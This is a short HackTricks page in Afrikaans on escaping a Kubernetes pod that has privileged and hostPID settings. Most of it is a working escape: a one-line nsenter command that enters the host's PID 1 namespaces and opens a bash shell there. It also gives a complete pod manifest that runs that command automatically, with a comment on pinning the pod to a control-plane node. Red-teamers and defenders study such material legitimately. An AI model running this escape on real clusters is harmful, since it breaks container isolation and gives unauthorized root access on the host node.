Pod Escape Privileges

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Privilege en hostPID

Met hierdie privileges sal jy toegang hê tot die gasheer se prosesse en genoeg privileges hê om binne die naamruimte van een van die gasheer se prosesse te gaan.
Let daarop dat jy moontlik nie privilegieer nodig het nie, maar net ’n paar vermoëns en ander potensiële verdedigingsoortredings (soos apparmor en/of seccomp).

Net om iets soos die volgende uit te voer, sal jou toelaat om uit die pod te ontsnap:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Konfigurasie voorbeeld:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks